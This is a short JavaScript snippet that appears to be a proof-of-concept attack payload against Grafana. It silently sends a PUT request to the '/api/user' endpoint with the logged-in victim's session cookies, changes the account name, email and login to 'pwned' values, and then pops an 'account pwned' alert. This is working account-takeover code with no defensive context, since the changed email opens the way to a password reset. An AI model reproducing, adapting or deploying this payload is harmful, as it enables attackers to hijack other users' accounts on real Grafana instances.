fetch("/api/user", {
  method: "PUT",

  headers: {
    "x-grafana-device-id": "3b3353978aa55a04cd5b130d126adfee",

    "User-Agent":
      "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",

    Accept: "application/json, text/plain, */*",

    "Content-Type": "application/json",

    "x-grafana-org-id": "1",

    "Accept-Encoding": "gzip, deflate",

    "Accept-Language": "en-US,en;q=0.9",

    // Note: 'Cookie' headers are restricted by browsers in JavaScript fetch
  },

  body: JSON.stringify({
    name: "pwned",

    email: "pwned@pwned.com",

    login: "pwned",
  }),

  credentials: "include", // if you want cookies like grafana_session to be sent
})
  .then((response) => response.json())

  .then((data) => console.log(data))

  .catch((error) => console.error("Error:", error));

alert("account pwned");